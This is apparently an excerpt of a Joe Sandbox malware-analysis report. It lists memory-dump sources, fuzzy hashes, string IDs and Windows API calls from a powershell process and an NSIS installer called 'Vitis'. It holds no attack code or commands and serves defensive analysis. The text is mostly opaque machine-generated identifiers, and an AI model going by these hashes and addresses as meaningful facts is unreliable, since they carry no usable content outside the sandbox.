                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                            • API String ID: 0-3997570045
                            • Opcode ID: a4a0acca32bf53a59436a5c540b2fea127de72a7ab122cc70962f8573d8ed98a
                            • Instruction ID: 838e661c648baaabf5a1f960c64a30007ac3aca9b10bb720d249fe64f42fa58f
                            • Opcode Fuzzy Hash: a4a0acca32bf53a59436a5c540b2fea127de72a7ab122cc70962f8573d8ed98a
                            • Instruction Fuzzy Hash: 424116F0A10306DFFBA4AEA4C445BA9B7E3AB45720F38C4AAD41D5F290C735D945CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: tP^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-324510305
                            • Opcode ID: 9404df8cf7268445cba875b3fb161cf1d788a8f162237124180f96049e0096ba
                            • Instruction ID: a7221be3200edc81b2b61871977c1d7d3f3aab3bba84196dfe9e73be977a5a6c
                            • Opcode Fuzzy Hash: 9404df8cf7268445cba875b3fb161cf1d788a8f162237124180f96049e0096ba
                            • Instruction Fuzzy Hash: 252126F2B213059FEB64AE65C804E65BBF4AF89610F14409BE9189F292CA31DD45C763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (o^q$(o^q$(o^q$(o^q
                            • API String ID: 0-1978863864
                            • Opcode ID: 721460515624d396424e7d92c7c075a8583f8c8296f4746927e3932a1541d112
                            • Instruction ID: aef24994b2e76e69ef7d4b2ea73684ac64055ad5a030f7aaba945fd03883fffd
                            • Opcode Fuzzy Hash: 721460515624d396424e7d92c7c075a8583f8c8296f4746927e3932a1541d112
                            • Instruction Fuzzy Hash: 54F157B1724306DFEB55AF68C800BEABBA6EFC1310F54846AE449CF291DB35D845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q
                            • API String ID: 0-1420252700
                            • Opcode ID: b63638e75852c06cc47f239edc754557c28e0d2f1c565a2d4091bb388c8197cd
                            • Instruction ID: eb68f393d508a103935a6cf5326cec757c0abeec36f08b8c6d2f19f9a0b427a8
                            • Opcode Fuzzy Hash: b63638e75852c06cc47f239edc754557c28e0d2f1c565a2d4091bb388c8197cd
                            • Instruction Fuzzy Hash: 5FF19EB0A00219DFDB54DB54C894B9EBBB2BF88304F1085A9E4096F795CB76ED85CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$$^q
                            • API String ID: 0-2125118731
                            • Opcode ID: dfd2e70e99f15c25c97591723dc9e4c87755d472c2f2e413ca43661a1a3f2a65
                            • Instruction ID: 95fe9c1fe883733dd1a7d2ecd4bd6ec9f63983bd605d14ba87b303098d6c437c
                            • Opcode Fuzzy Hash: dfd2e70e99f15c25c97591723dc9e4c87755d472c2f2e413ca43661a1a3f2a65
                            • Instruction Fuzzy Hash: 9221E5F291430B9BEBB5AEE5C4403B6BBF6AF81220F38446AC44C9B106D731D44DC751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q
                            • API String ID: 0-2049395529
                            • Opcode ID: 239cd297f4fa1ee36283e7614c750a55053e15ac7c5b1e78194e2de7d5ff2f18
                            • Instruction ID: 02d60bf82e56c70f8a606231a24e6a24166c4688acd54b0f4be5b9007e914351
                            • Opcode Fuzzy Hash: 239cd297f4fa1ee36283e7614c750a55053e15ac7c5b1e78194e2de7d5ff2f18
                            • Instruction Fuzzy Hash: AA018460A0A3C69FD76B2278582025A6FF65FC3900B1A45DBD084DF29BCD658C4D8367
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNEL32(00008001), ref: 0040351A
                            • GetVersionExW.KERNEL32(?), ref: 00403543
                            • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                            • OleInitialize.OLE32(00000000), ref: 00403634
                            • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                            • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004036A0
                            • GetTempPathW.KERNEL32(00000400,00437800,00000000,?), ref: 004037D3
                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB), ref: 004037E4
                            • lstrcatW.KERNEL32(00437800,\Temp), ref: 004037F0
                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp), ref: 00403804
                            • lstrcatW.KERNEL32(00437800,Low), ref: 0040380C
                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low), ref: 0040381D
                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800), ref: 00403825
                            • DeleteFileW.KERNEL32(00437000), ref: 00403839
                            • lstrcatW.KERNEL32(00437800,~nsu), ref: 00403920
                            • lstrcatW.KERNEL32(00437800,0040A26C), ref: 0040392F
                              • Part of subcall function 00405AB5: CreateDirectoryW.KERNEL32(?,00000000,004034EA,00437800,00437800,00437800,00437800,00437800,004037DA), ref: 00405ABB
                            • lstrcatW.KERNEL32(00437800,.tmp), ref: 0040393A
                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403946
                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800), ref: 00403966
                            • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                            • CopyFileW.KERNEL32(00438800,00420EC8,00000001), ref: 004039D8
                            • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                            • OleUninitialize.OLE32(?), ref: 00403A28
                            • ExitProcess.KERNEL32 ref: 00403A42
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                            • ExitProcess.KERNEL32 ref: 00403AD6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 3859024572-3195845224
                            • Opcode ID: b83c6689fc87aa81701fa9317f990bacd70601a7b96237c8952e310db2741e89
                            • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                            • Opcode Fuzzy Hash: b83c6689fc87aa81701fa9317f990bacd70601a7b96237c8952e310db2741e89
                            • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DeleteFileW.KERNEL32(?,?,74DF3420,00437800,00000000), ref: 00405C3C
                            • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,00437800,00000000), ref: 00405CAD
                            • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,00437800,00000000), ref: 00405CBD
                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                            • FindClose.KERNEL32(00000000), ref: 00405D6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$\*.*
                            • API String ID: 2035342205-3749113046
                            • Opcode ID: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
                            • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                            • Opcode Fuzzy Hash: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
                            • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindFirstFileW.KERNEL32(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,00437800,00405C33,?,74DF3420,00437800), ref: 00406848
                            • FindClose.KERNEL32(00000000), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID: XgB
                            • API String ID: 2295610775-796949446
                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,00000403), ref: 00405706
                            • GetDlgItem.USER32(?,000003EE), ref: 00405715
                            • GetClientRect.USER32(?,?), ref: 00405752
                            • GetSystemMetrics.USER32(00000002), ref: 00405759
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                            • ShowWindow.USER32(?,00000008), ref: 004057F5
                            • GetDlgItem.USER32(?,000003EC), ref: 00405816
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                            • GetDlgItem.USER32(?,000003F8), ref: 00405724
                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                            • GetDlgItem.USER32(?,000003EC), ref: 00405868
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                            • CloseHandle.KERNEL32(00000000), ref: 0040587D
                            • ShowWindow.USER32(00000000), ref: 004058A1
                            • ShowWindow.USER32(?,00000008), ref: 004058A6
                            • ShowWindow.USER32(00000008), ref: 004058F0
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                            • CreatePopupMenu.USER32 ref: 00405935
                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                            • GetWindowRect.USER32(?,?), ref: 00405969
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                            • OpenClipboard.USER32(00000000), ref: 004059CA
                            • EmptyClipboard.USER32 ref: 004059D0
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                            • GlobalLock.KERNEL32(00000000), ref: 004059E6
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                            • CloseClipboard.USER32 ref: 00405A2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID: {
                            • API String ID: 590372296-366298937
                            • Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                            • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                            • Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                            • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                            • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                            • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                            • DeleteObject.GDI32(00000000), ref: 00404FCA
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                            • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                            • ShowWindow.USER32(?,00000005), ref: 0040512C
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                            • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                            • GlobalFree.KERNEL32(?), ref: 0040530A
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                            • ShowWindow.USER32(?,00000000), ref: 004054B4
                            • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                            • ShowWindow.USER32(00000000), ref: 004054C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                            • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                            • Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                            • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                            • ShowWindow.USER32(?), ref: 00403FC0
                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                            • DestroyWindow.USER32 ref: 00403FFF
                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                            • GetDlgItem.USER32(?,?), ref: 00404037
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                            • ShowWindow.USER32(00000000,?), ref: 00404239
                            • EnableWindow.USER32(?,?), ref: 0040424B
                            • EnableWindow.USER32(?,?), ref: 00404266
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                            • EnableMenuItem.USER32(00000000), ref: 00404283
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                            • String ID:
                            • API String ID: 1860320154-0
                            • Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                            • Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                              • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                            • lstrcatW.KERNEL32(00437000,00423708), ref: 00403C37
                            • lstrlenW.KERNEL32(004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
                            • lstrcmpiW.KERNEL32(004281B8,.exe,004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                            • GetFileAttributesW.KERNEL32(004281C0,?,00000000,?), ref: 00403CD5
                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D1E
                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                            • RegisterClassW.USER32(004291C0), ref: 00403D5B
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                            • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                            • RegisterClassW.USER32(004291C0), ref: 00403E20
                            • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 1975747703-1115850852
                            • Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                            • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                            • Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                            • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                            • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                            • GetSysColor.USER32(?), ref: 00404702
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                            • lstrlenW.KERNEL32(?), ref: 00404723
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                            • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                            • SendMessageW.USER32(00000000), ref: 004047A5
                            • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                            • SetCursor.USER32(00000000), ref: 00404824
                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                            • SetCursor.USER32(00000000), ref: 00404840
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
